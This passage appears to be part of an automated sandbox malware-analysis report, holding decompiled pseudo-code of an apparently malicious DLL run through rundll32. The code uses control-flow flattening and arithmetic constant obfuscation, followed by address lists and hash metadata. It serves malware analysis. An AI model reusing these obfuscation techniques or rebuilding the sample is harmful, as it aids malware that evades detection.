                                                                        				signed int _t437;
                                                                        				signed int _t438;
                                                                        				signed int _t439;
                                                                        				signed int _t440;
                                                                        				signed int _t442;
                                                                        				void* _t446;
                                                                        
                                                                        				 *((intOrPtr*)(_t446 + 0xa4)) = 0x772f9f;
                                                                        				 *(_t446 + 0xac) = 0;
                                                                        				 *(_t446 + 0xa8) = 0x789ddf;
                                                                        				_t395 = 0x19391156;
                                                                        				 *(_t446 + 0x6c) = 0xa1c8;
                                                                        				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) << 0xd;
                                                                        				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) ^ 0x14390001;
                                                                        				 *(_t446 + 0xc) = 0xff4b;
                                                                        				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x5146fe6d;
                                                                        				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x6d1dcf2b;
                                                                        				 *(_t446 + 0xc) =  *(_t446 + 0xc) >> 5;
                                                                        				 *(_t446 + 0xc) =  *(_t446 + 0xc) ^ 0x01e2de71;
                                                                        				 *(_t446 + 0x14) = 0x3f5c;
                                                                        				 *(_t446 + 0x14) =  *(_t446 + 0x14) | 0xe97d3723;
                                                                        				 *(_t446 + 0xa0) = 0;
                                                                        				_t22 = _t446 + 0x14; // 0xe97d3723
                                                                        				 *(_t446 + 0x24) =  *_t22 * 0x76;
                                                                        				 *(_t446 + 0x24) =  *(_t446 + 0x24) >> 7;
                                                                        				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x013f0ad7;
                                                                        				 *(_t446 + 0x58) = 0x736e;
                                                                        				 *(_t446 + 0x58) =  *(_t446 + 0x58) >> 1;
                                                                        				_t435 = 0x7c;
                                                                        				 *(_t446 + 0x5c) =  *(_t446 + 0x58) * 0x3a;
                                                                        				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) ^ 0x000d12ba;
                                                                        				 *(_t446 + 0xac) = 0xcefa;
                                                                        				 *(_t446 + 0xac) =  *(_t446 + 0xac) | 0xd3773184;
                                                                        				 *(_t446 + 0xac) =  *(_t446 + 0xac) ^ 0xd377a5bb;
                                                                        				 *(_t446 + 0x14) = 0xdd96;
                                                                        				 *(_t446 + 0x14) =  *(_t446 + 0x14) + 0xffffff88;
                                                                        				 *(_t446 + 0x14) =  *(_t446 + 0x14) ^ 0x5290399f;
                                                                        				 *(_t446 + 0x14) =  *(_t446 + 0x14) << 0xd;
                                                                        				 *(_t446 + 0x14) =  *(_t446 + 0x14) ^ 0x1c901162;
                                                                        				 *(_t446 + 0x74) = 0x655b;
                                                                        				 *(_t446 + 0x74) =  *(_t446 + 0x74) | 0xcd9490d8;
                                                                        				 *(_t446 + 0x74) =  *(_t446 + 0x74) ^ 0xcd94b23a;
                                                                        				 *(_t446 + 0xa0) = 0x6c7f;
                                                                        				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x13eba5b2;
                                                                        				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x13ebbb7e;
                                                                        				 *(_t446 + 0x94) = 0x7a54;
                                                                        				 *(_t446 + 0x94) =  *(_t446 + 0x94) / _t435;
                                                                        				 *(_t446 + 0x94) =  *(_t446 + 0x94) ^ 0x00007779;
                                                                        				 *(_t446 + 0x4c) = 0xc640;
                                                                        				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) >> 5;
                                                                        				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) ^ 0x0a555cb4;
                                                                        				 *(_t446 + 0x4c) =  *(_t446 + 0x4c) ^ 0x0a557f70;
                                                                        				 *(_t446 + 0x38) = 0x22ba;
                                                                        				_t436 = 0x67;
                                                                        				 *(_t446 + 0x38) =  *(_t446 + 0x38) / _t436;
                                                                        				 *(_t446 + 0x38) =  *(_t446 + 0x38) >> 5;
                                                                        				 *(_t446 + 0x38) =  *(_t446 + 0x38) + 0x267c;
                                                                        				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0x00005dad;
                                                                        				 *(_t446 + 0xb0) = 0x929;
                                                                        				 *(_t446 + 0xb0) =  *(_t446 + 0xb0) + 0xffff6954;
                                                                        				 *(_t446 + 0xb0) =  *(_t446 + 0xb0) ^ 0xffff7ae2;
                                                                        				 *(_t446 + 0x18) = 0xce9e;
                                                                        				 *(_t446 + 0x18) =  *(_t446 + 0x18) + 0xffff0e6b;
                                                                        				 *(_t446 + 0x18) =  *(_t446 + 0x18) | 0x6011ff3c;
                                                                        				 *(_t446 + 0x18) =  *(_t446 + 0x18) << 0xc;
                                                                        				 *(_t446 + 0x18) =  *(_t446 + 0x18) ^ 0xfff39ad2;
                                                                        				 *(_t446 + 0x70) = 0xb975;
                                                                        				_t431 = 0x16;
                                                                        				 *(_t446 + 0x6c) =  *(_t446 + 0x70) / _t431;
                                                                        				 *(_t446 + 0x6c) =  *(_t446 + 0x6c) ^ 0x00003cc7;
                                                                        				 *(_t446 + 0x64) = 0x8a7;
                                                                        				_t437 = 0x17;
                                                                        				 *(_t446 + 0x68) =  *(_t446 + 0x64) / _t437;
                                                                        				 *(_t446 + 0x68) =  *(_t446 + 0x68) + 0x9f8;
                                                                        				 *(_t446 + 0x68) =  *(_t446 + 0x68) ^ 0x00004bf2;
                                                                        				 *(_t446 + 0xa8) = 0x9dab;
                                                                        				 *(_t446 + 0xa8) =  *(_t446 + 0xa8) >> 3;
                                                                        				 *(_t446 + 0xa8) =  *(_t446 + 0xa8) ^ 0x00004fe2;
                                                                        				 *(_t446 + 0x8c) = 0xe61d;
                                                                        				_t438 = 0x51;
                                                                        				 *(_t446 + 0x8c) =  *(_t446 + 0x8c) * 0x24;
                                                                        				 *(_t446 + 0x8c) =  *(_t446 + 0x8c) ^ 0x00200b54;
                                                                        				 *(_t446 + 0x48) = 0x4300;
                                                                        				 *(_t446 + 0x48) =  *(_t446 + 0x48) >> 0xb;
                                                                        				 *(_t446 + 0x48) =  *(_t446 + 0x48) << 0xd;
                                                                        				 *(_t446 + 0x48) =  *(_t446 + 0x48) ^ 0x00016849;
                                                                        				 *(_t446 + 0x44) = 0x14fb;
                                                                        				 *(_t446 + 0x44) =  *(_t446 + 0x44) >> 4;
                                                                        				 *(_t446 + 0x44) =  *(_t446 + 0x44) >> 3;
                                                                        				 *(_t446 + 0x44) =  *(_t446 + 0x44) ^ 0x000014fe;
                                                                        				 *(_t446 + 0x64) = 0x908d;
                                                                        				 *(_t446 + 0x64) =  *(_t446 + 0x64) + 0xda51;
                                                                        				 *(_t446 + 0x64) =  *(_t446 + 0x64) ^ 0x6d67fea7;
                                                                        				 *(_t446 + 0x64) =  *(_t446 + 0x64) ^ 0x6d669443;
                                                                        				 *(_t446 + 0x24) = 0x5ccc;
                                                                        				 *(_t446 + 0x24) =  *(_t446 + 0x24) * 0x61;
                                                                        				 *(_t446 + 0x24) =  *(_t446 + 0x24) / _t438;
                                                                        				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x12e038eb;
                                                                        				 *(_t446 + 0x24) =  *(_t446 + 0x24) ^ 0x12e0646f;
                                                                        				 *(_t446 + 0x78) = 0x27f;
                                                                        				 *(_t446 + 0x78) =  *(_t446 + 0x78) << 9;
                                                                        				 *(_t446 + 0x78) =  *(_t446 + 0x78) ^ 0x0004fb39;
                                                                        				 *(_t446 + 0x1c) = 0x6d1d;
                                                                        				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) >> 9;
                                                                        				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) + 0xb85e;
                                                                        				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) ^ 0xaa7cb7d8;
                                                                        				 *(_t446 + 0x1c) =  *(_t446 + 0x1c) ^ 0xaa7c6457;
                                                                        				 *(_t446 + 0x54) = 0x7318;
                                                                        				 *(_t446 + 0x54) =  *(_t446 + 0x54) >> 0xd;
                                                                        				 *(_t446 + 0x54) =  *(_t446 + 0x54) + 0xffff7495;
                                                                        				 *(_t446 + 0x54) =  *(_t446 + 0x54) ^ 0xffff5a53;
                                                                        				 *(_t446 + 0x90) = 0xb397;
                                                                        				 *(_t446 + 0x90) =  *(_t446 + 0x90) + 0x578a;
                                                                        				 *(_t446 + 0x90) =  *(_t446 + 0x90) ^ 0x00016114;
                                                                        				 *(_t446 + 0x34) = 0xd228;
                                                                        				 *(_t446 + 0x34) =  *(_t446 + 0x34) >> 4;
                                                                        				 *(_t446 + 0x34) =  *(_t446 + 0x34) ^ 0x6376bfe7;
                                                                        				 *(_t446 + 0x34) =  *(_t446 + 0x34) << 0xe;
                                                                        				 *(_t446 + 0x34) =  *(_t446 + 0x34) ^ 0xacb136be;
                                                                        				 *(_t446 + 0x88) = 0x4cf0;
                                                                        				 *(_t446 + 0x88) =  *(_t446 + 0x88) + 0xaecf;
                                                                        				 *(_t446 + 0x88) =  *(_t446 + 0x88) ^ 0x0000fedc;
                                                                        				 *(_t446 + 0x2c) = 0x629e;
                                                                        				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) + 0xd78b;
                                                                        				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) + 0x81bf;
                                                                        				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) << 0xf;
                                                                        				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) ^ 0xddf43aaf;
                                                                        				 *(_t446 + 0x98) = 0xefe2;
                                                                        				 *(_t446 + 0x98) =  *(_t446 + 0x98) << 4;
                                                                        				 *(_t446 + 0x98) =  *(_t446 + 0x98) ^ 0x000efba1;
                                                                        				 *(_t446 + 0x50) = 0xde18;
                                                                        				 *(_t446 + 0x50) =  *(_t446 + 0x50) + 0x6327;
                                                                        				 *(_t446 + 0x50) =  *(_t446 + 0x50) | 0xdc33595a;
                                                                        				 *(_t446 + 0x50) =  *(_t446 + 0x50) ^ 0xdc335491;
                                                                        				 *(_t446 + 0x7c) = 0xe244;
                                                                        				 *(_t446 + 0x7c) =  *(_t446 + 0x7c) ^ 0x4f81d147;
                                                                        				 *(_t446 + 0x7c) =  *(_t446 + 0x7c) ^ 0x4f817701;
                                                                        				 *(_t446 + 0x9c) = 0xcfc5;
                                                                        				_t439 = 0x13;
                                                                        				_t444 =  *(_t446 + 0x68);
                                                                        				 *(_t446 + 0x98) =  *(_t446 + 0x9c) / _t439;
                                                                        				 *(_t446 + 0x98) =  *(_t446 + 0x98) ^ 0x00007994;
                                                                        				 *(_t446 + 0xa0) = 0xdcf0;
                                                                        				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) >> 5;
                                                                        				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x00004aa7;
                                                                        				 *(_t446 + 0x80) = 0xb565;
                                                                        				 *(_t446 + 0x80) =  *(_t446 + 0x80) | 0xd87788ca;
                                                                        				 *(_t446 + 0x80) =  *(_t446 + 0x80) ^ 0xd877c5fd;
                                                                        				 *(_t446 + 0x38) = 0x6376;
                                                                        				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0xd60ebee2;
                                                                        				 *(_t446 + 0x38) =  *(_t446 + 0x38) + 0xdd50;
                                                                        				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0x3a07644d;
                                                                        				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0xec08a801;
                                                                        				 *(_t446 + 0x3c) = 0x1f0d;
                                                                        				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) | 0xe9d4bb8b;
                                                                        				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) ^ 0x531b6b57;
                                                                        				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) ^ 0xbacf9971;
                                                                        				 *(_t446 + 0x5c) = 0x2ec0;
                                                                        				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) << 0xc;
                                                                        				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) >> 0xe;
                                                                        				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) ^ 0x00004eb6;
                                                                        				 *(_t446 + 0x54) = 0xc421;
                                                                        				 *(_t446 + 0x54) =  *(_t446 + 0x54) + 0x4f00;
                                                                        				 *(_t446 + 0x54) =  *(_t446 + 0x54) >> 0xa;
                                                                        				 *(_t446 + 0x54) =  *(_t446 + 0x54) ^ 0x0000676b;
                                                                        				 *(_t446 + 0x2c) = 0x5f98;
                                                                        				_t393 =  *(_t446 + 0x68);
                                                                        				_t432 =  *(_t446 + 0x68);
                                                                        				_t440 =  *(_t446 + 0x68);
                                                                        				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) / _t431;
                                                                        				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) << 0xc;
                                                                        				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) * 0x50;
                                                                        				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) ^ 0x15b80003;
                                                                        				while(1) {
                                                                        					L1:
                                                                        					_t369 = 0x667bbe4;
                                                                        					L2:
                                                                        					while(_t395 != 0x333430e) {
                                                                        						if(_t395 == _t369) {
                                                                        							_t372 = E10016409( *(_t446 + 0x70),  *(_t446 + 0x90),  *(_t446 + 0x4c), _t432, _t395, _t440, _t446 + 0xc4,  *(_t446 + 0x94), _t395,  *((intOrPtr*)(_t446 + 0x84)),  *(_t446 + 0x24), _t393, _t395,  *(_t446 + 0x50));
                                                                        							_t446 = _t446 + 0x30;
                                                                        							__eflags = _t372;
                                                                        							if(_t372 == 0) {
                                                                        								_t373 =  *(_t446 + 0xb0);
                                                                        							} else {
                                                                        								_t442 = _t432;
                                                                        								while(1) {
                                                                        									__eflags =  *((intOrPtr*)(_t442 + 4)) - 4;
                                                                        									if( *((intOrPtr*)(_t442 + 4)) != 4) {
                                                                        										goto L19;
                                                                        									}
                                                                        									L18:
                                                                        									_t335 = _t442 + 0xc; // 0x4bfe
                                                                        									_t378 = E1000D867(_t444,  *(_t446 + 0x98), _t335,  *(_t446 + 0x38),  *(_t446 + 0x88),  *((intOrPtr*)(_t446 + 0x28)));
                                                                        									_t446 = _t446 + 0x10;
                                                                        									__eflags = _t378;
                                                                        									if(_t378 == 0) {
                                                                        										_t373 = 1;
                                                                        										 *(_t446 + 0xb0) = 1;
                                                                        									} else {
                                                                        										goto L19;
                                                                        									}
                                                                        									L24:
                                                                        									_t440 =  *(_t446 + 0x68);
                                                                        									goto L25;
                                                                        									L19:
                                                                        									_t376 =  *_t442;
                                                                        									__eflags = _t376;
                                                                        									if(_t376 == 0) {
                                                                        										_t373 =  *(_t446 + 0xb0);
                                                                        									} else {
                                                                        										_t442 = _t442 + _t376;
                                                                        										__eflags =  *((intOrPtr*)(_t442 + 4)) - 4;
                                                                        										if( *((intOrPtr*)(_t442 + 4)) != 4) {
                                                                        											goto L19;
                                                                        										}
                                                                        									}
                                                                        									goto L24;
                                                                        								}
                                                                        							}
                                                                        							L25:
                                                                        							__eflags = _t373;
                                                                        							if(__eflags == 0) {
                                                                        								_t369 = 0x667bbe4;
                                                                        								_t395 = 0x667bbe4;
                                                                        								continue;
                                                                        							} else {
                                                                        								_t374 =  *0x10021404; // 0x0
                                                                        								E10017309( *(_t446 + 0x94),  *(_t446 + 0x4c),  *_t374);
                                                                        								_t395 = 0x3007dbb6;
                                                                        								goto L1;
                                                                        							}
                                                                        							L31:
                                                                        						} else {
                                                                        							if(_t395 == 0x133ba569) {
                                                                        								E10008C0C( *((intOrPtr*)(_t446 + 0x30)), __eflags,  *((intOrPtr*)(_t446 + 0x60)),  *(_t446 + 0xac), _t446 + 0xc4);
                                                                        								_t383 = E10001E13( *((intOrPtr*)(_t446 + 0x28)),  *(_t446 + 0x88),  *(_t446 + 0xb0),  *(_t446 + 0xa0), _t446 + 0xd0);
                                                                        								_t444 = _t383;
                                                                        								_t446 = _t446 + 0x18;
                                                                        								_t395 = 0x1f405b52;
                                                                        								 *((short*)(_t383 - 2)) = 0;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t369 = 0x667bbe4;
                                                                        									goto L2;
                                                                        								}
                                                                        							} else {
                                                                        								if(_t395 == 0x1614145d) {
                                                                        									_t440 = 0x1000;
                                                                        									_push(_t395);
                                                                        									 *(_t446 + 0x6c) = 0x1000;
                                                                        									_t432 = E100157E8(0x1000);
                                                                        									_t369 = 0x667bbe4;
                                                                        									__eflags = _t432;
                                                                        									_t395 =  !=  ? 0x667bbe4 : 0x333430e;
                                                                        									continue;
                                                                        								} else {
                                                                        									if(_t395 == 0x19391156) {
                                                                        										_t395 = 0x133ba569;
                                                                        										continue;
                                                                        									} else {
                                                                        										if(_t395 == 0x1f405b52) {
                                                                        											_t389 = E1000492A( *(_t446 + 0x5c),  *(_t446 + 0x4c) | 0x00000006,  *(_t446 + 0x74),  *(_t446 + 0x5c),  *((intOrPtr*)(_t446 + 0xd0)), _t395, 1,  *(_t446 + 0x2c), _t395, _t446 + 0xc8, 0x2000000,  *(_t446 + 0x74),  *(_t446 + 0x68),  *((intOrPtr*)(_t446 + 0xa4)));
                                                                        											_t393 = _t389;
                                                                        											_t446 = _t446 + 0x30;
                                                                        											__eflags = _t389 - 0xffffffff;
                                                                        											if(__eflags != 0) {
                                                                        												_t395 = 0x1614145d;
                                                                        												while(1) {
                                                                        													L1:
                                                                        													_t369 = 0x667bbe4;
                                                                        													goto L2;
                                                                        												}
                                                                        											}
                                                                        										} else {
                                                                        											if(_t395 != 0x3007dbb6) {
                                                                        												L29:
                                                                        												__eflags = _t395 - 0x35dcba61;
                                                                        												if(__eflags != 0) {
                                                                        													continue;
                                                                        												}
                                                                        											} else {
                                                                        												E100091CD( *((intOrPtr*)(_t446 + 0x84)),  *((intOrPtr*)(_t446 + 0xa4)),  *(_t446 + 0xa8), _t432,  *(_t446 + 0x80));
                                                                        												_t446 = _t446 + 0xc;
                                                                        												_t395 = 0x333430e;
                                                                        												while(1) {
                                                                        													L1:
                                                                        													_t369 = 0x667bbe4;
                                                                        													goto L2;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						__eflags = 0;
                                                                        						return 0;
                                                                        						goto L31;
                                                                        					}
                                                                        					E100078F0(_t393,  *(_t446 + 0x44),  *(_t446 + 0x44),  *((intOrPtr*)(_t446 + 0x60)),  *(_t446 + 0x54));
                                                                        					_t446 = _t446 + 0xc;
                                                                        					_t395 = 0x35dcba61;
                                                                        					_t369 = 0x667bbe4;
                                                                        					goto L29;
                                                                        				}
                                                                        			}






















                                                                        0x10017193
                                                                        0x10017199
                                                                        0x100171a0
                                                                        0x00000000
                                                                        0x100170c4
                                                                        0x100170ca
                                                                        0x1001716b
                                                                        0x00000000
                                                                        0x100170d0
                                                                        0x100170d6
                                                                        0x1001714e
                                                                        0x10017153
                                                                        0x10017155
                                                                        0x10017158
                                                                        0x1001715b
                                                                        0x10017161
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x00000000
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x100170d8
                                                                        0x100170de
                                                                        0x100172ee
                                                                        0x100172ee
                                                                        0x100172f4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100170e4
                                                                        0x10017101
                                                                        0x10017106
                                                                        0x10017109
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x00000000
                                                                        0x10017093
                                                                        0x10017093
                                                                        0x100170de
                                                                        0x100170d6
                                                                        0x100170ca
                                                                        0x100170be
                                                                        0x100170b2
                                                                        0x100172fd
                                                                        0x10017306
                                                                        0x00000000
                                                                        0x10017306
                                                                        0x100172dc
                                                                        0x100172e1
                                                                        0x100172e4
                                                                        0x100172e9
                                                                        0x00000000
                                                                        0x100172e9

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #7}$'c$)$D$[e$kg$ns$vc$yw$O
                                                                        • API String ID: 0-1013673946
                                                                        • Opcode ID: 3dacd4352d9c33c1731b4215249d3e15c2e411b10bbaa018ca579d51b917f277
                                                                        • Instruction ID: f2670378fa826e8d31e23e03b62a8b8a54816961439a19b05cfa054466784345
                                                                        • Opcode Fuzzy Hash: 3dacd4352d9c33c1731b4215249d3e15c2e411b10bbaa018ca579d51b917f277
                                                                        • Instruction Fuzzy Hash: 250211711083809FE3A8CF21C58AA5FBBF1FBC5758F10891DE59A862A0D7B59949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E1000C07D(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v4;
                                                                        				intOrPtr _v8;
                                                                        				char _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				unsigned int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				intOrPtr _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				signed int _v112;
                                                                        				signed int _v116;
                                                                        				signed int _v120;
                                                                        				void* _t249;
                                                                        				intOrPtr _t273;
                                                                        				intOrPtr _t275;
                                                                        				void* _t292;
                                                                        				signed int _t294;
                                                                        				signed int _t295;
                                                                        				signed int _t296;
                                                                        				signed int _t297;
                                                                        				intOrPtr* _t318;
                                                                        				signed int _t319;
                                                                        				intOrPtr* _t322;
                                                                        				signed int* _t324;
                                                                        				void* _t327;
                                                                        
                                                                        				_push(_a8);
                                                                        				_t322 = __edx;
                                                                        				_t318 = __ecx;
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t249);
                                                                        				_v16 = 0x7669;
                                                                        				_t324 =  &(( &_v120)[4]);
                                                                        				_v16 = _v16 << 0xc;
                                                                        				_v16 = _v16 ^ 0x0766ed4f;
                                                                        				_t292 = 0;
                                                                        				_v96 = 0xa3dc;
                                                                        				_t319 = 0xc83da09;
                                                                        				_v96 = _v96 << 0x10;
                                                                        				_v96 = _v96 >> 0xb;
                                                                        				_v96 = _v96 ^ 0xd5d56a35;
                                                                        				_v96 = _v96 ^ 0xd5c17d1d;
                                                                        				_v88 = 0x57ea;
                                                                        				_t294 = 0x44;
                                                                        				_v88 = _v88 * 0x5e;
                                                                        				_v88 = _v88 * 0x6d;
                                                                        				_v88 = _v88 ^ 0xe3cf2272;
                                                                        				_v88 = _v88 ^ 0xee71a60d;
                                                                        				_v92 = 0x3245;
                                                                        				_v92 = _v92 >> 9;
                                                                        				_v92 = _v92 >> 7;
                                                                        				_v92 = _v92 ^ 0xb732a7fa;
                                                                        				_v92 = _v92 ^ 0xb732c7ae;
                                                                        				_v40 = 0x3209;
                                                                        				_v40 = _v40 >> 0xc;
                                                                        				_v40 = _v40 + 0xffff23da;
                                                                        				_v40 = _v40 ^ 0xffff5649;
                                                                        				_v44 = 0xfee;
                                                                        				_v44 = _v44 * 0x3a;
                                                                        				_v44 = _v44 + 0xffff023b;
                                                                        				_v44 = _v44 ^ 0x00028194;
                                                                        				_v20 = 0x6fe9;
                                                                        				_v20 = _v20 ^ 0x83bafbf8;
                                                                        				_v20 = _v20 ^ 0x83baebed;
                                                                        				_v52 = 0x55fd;
                                                                        				_v52 = _v52 >> 3;
                                                                        				_v52 = _v52 / _t294;
                                                                        				_v52 = _v52 ^ 0x00006fa3;
                                                                        				_v56 = 0x7487;
                                                                        				_t295 = 0x59;
                                                                        				_v56 = _v56 / _t295;
                                                                        				_v56 = _v56 + 0xca5f;
                                                                        				_v56 = _v56 ^ 0x000097d2;
                                                                        				_v60 = 0x67db;
                                                                        				_v60 = _v60 + 0xffff6270;
                                                                        				_v60 = _v60 ^ 0xc598274b;
                                                                        				_v60 = _v60 ^ 0x3a67f21b;
                                                                        				_v24 = 0x2803;
                                                                        				_v24 = _v24 ^ 0x5736d0c5;
                                                                        				_v24 = _v24 ^ 0x5736adce;
                                                                        				_v28 = 0x6556;
                                                                        				_v28 = _v28 ^ 0x16a4143a;
                                                                        				_v28 = _v28 ^ 0x16a44fe2;
                                                                        				_v64 = 0x2652;
                                                                        				_v64 = _v64 << 1;
                                                                        				_v64 = _v64 * 0x60;
                                                                        				_v64 = _v64 ^ 0x001ca86e;
                                                                        				_v116 = 0xa093;
                                                                        				_v116 = _v116 | 0x704eabb3;
                                                                        				_v116 = _v116 >> 0xe;
                                                                        				_t296 = 0x26;
                                                                        				_v116 = _v116 * 0x25;
                                                                        				_v116 = _v116 ^ 0x0040c4bc;
                                                                        				_v80 = 0xb33b;
                                                                        				_v80 = _v80 >> 6;
                                                                        				_v80 = _v80 >> 0xd;
                                                                        				_v80 = _v80 ^ 0x000057d5;
                                                                        				_v120 = 0xdf18;
                                                                        				_v120 = _v120 | 0xefceebfd;
                                                                        				_v120 = _v120 + 0xf560;
                                                                        				_v120 = _v120 ^ 0xefcfb7f2;
                                                                        				_v84 = 0x84bb;
                                                                        				_v84 = _v84 ^ 0xda107d20;
                                                                        				_v84 = _v84 << 8;
                                                                        				_v84 = _v84 ^ 0x10f9b229;
                                                                        				_v68 = 0xeff9;
                                                                        				_v68 = _v68 / _t296;
                                                                        				_v68 = _v68 >> 0x10;
                                                                        				_v68 = _v68 ^ 0x00000bea;
                                                                        				_v100 = 0x20d7;
                                                                        				_v100 = _v100 >> 3;
                                                                        				_t297 = 0x59;
                                                                        				_v100 = _v100 * 0x53;
                                                                        				_v100 = _v100 >> 6;
                                                                        				_v100 = _v100 ^ 0x00004dbe;
                                                                        				_v104 = 0x1634;
                                                                        				_v104 = _v104 | 0xa08b3358;
                                                                        				_v104 = _v104 * 0x64;
                                                                        				_v104 = _v104 | 0xcfa784de;
                                                                        				_v104 = _v104 ^ 0xffe789e4;
                                                                        				_v108 = 0x3cd;
                                                                        				_v108 = _v108 | 0xda478b90;
                                                                        				_v108 = _v108 ^ 0x76068ebd;
                                                                        				_v108 = _v108 * 0x60;
                                                                        				_v108 = _v108 ^ 0x986216c6;
                                                                        				_v112 = 0x5ea3;
                                                                        				_v112 = _v112 * 0x50;
                                                                        				_v112 = _v112 / _t297;
                                                                        				_v112 = _v112 >> 6;
                                                                        				_v112 = _v112 ^ 0x0000527a;
                                                                        				_v32 = 0x8038;
                                                                        				_v32 = _v32 + 0xffff845e;
                                                                        				_v32 = _v32 ^ 0x00005668;
                                                                        				_v72 = 0x3956;
                                                                        				_v72 = _v72 ^ 0xc34d822a;
                                                                        				_v72 = _v72 | 0x19b55510;
                                                                        				_v72 = _v72 ^ 0xdbfdff55;
                                                                        				_v36 = 0x9b67;
                                                                        				_v36 = _v36 >> 5;
                                                                        				_v36 = _v36 ^ 0x00004f8e;
                                                                        				_v76 = 0x4339;
                                                                        				_v76 = _v76 + 0xfffff79c;
                                                                        				_v76 = _v76 + 0x9b18;
                                                                        				_v76 = _v76 ^ 0x00009e95;
                                                                        				while(1) {
                                                                        					_t268 = _v48;
                                                                        					while(1) {
                                                                        						L2:
                                                                        						_t327 = _t319 - 0x26339395;
                                                                        						if(_t327 > 0) {
                                                                        							break;
                                                                        						}
                                                                        						if(_t327 == 0) {
                                                                        							_push(_t297);
                                                                        							E10005B05(_v68,  *((intOrPtr*)( *0x100221b4 + 0x14)), _t297, _v8, _v100, _v104, _t297, _v108, _v112, _v32, _v12);
                                                                        							_t324 =  &(_t324[0xa]);
                                                                        							_t297 = 1;
                                                                        							_t319 = 0x1081595e;
                                                                        							_t292 =  !=  ? 1 : _t292;
                                                                        							while(1) {
                                                                        								_t268 = _v48;
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        						if(_t319 == 0xc83da09) {
                                                                        							_t319 = 0x357aa1fe;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t319 == 0x1081595e) {
                                                                        							E1000D7B0(_v12);
                                                                        							_t297 = _t297;
                                                                        							_t319 = 0x172012b8;
                                                                        							while(1) {
                                                                        								_t268 = _v48;
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        						if(_t319 == 0x16b83fff) {
                                                                        							_t319 = 0x2f4aaa5a;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t319 == 0x172012b8) {
                                                                        							if(_t292 == 0) {
                                                                        								E100091CD(_v88, _v92, _v40,  *_t318, _v44);
                                                                        							}
                                                                        							L29:
                                                                        							return _t292;
                                                                        						}
                                                                        						if(_t319 != 0x24206dd0) {
                                                                        							L25:
                                                                        							if(_t319 == 0x2ef876fe) {
                                                                        								goto L29;
                                                                        							}
                                                                        							while(1) {
                                                                        								_t268 = _v48;
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        						E10001BB6(_t318 + 4, _v116, _t297,  *_t318, _v12, _v80,  *((intOrPtr*)( *0x100221b4)), _v120, _v84);
                                                                        						_t324 =  &(_t324[8]);
                                                                        						asm("sbb esi, esi");
                                                                        						_t319 = (_t319 & 0x15b23a37) + 0x1081595e;
                                                                        						while(1) {
                                                                        							_t268 = _v48;
                                                                        							goto L2;
                                                                        						}
                                                                        					}
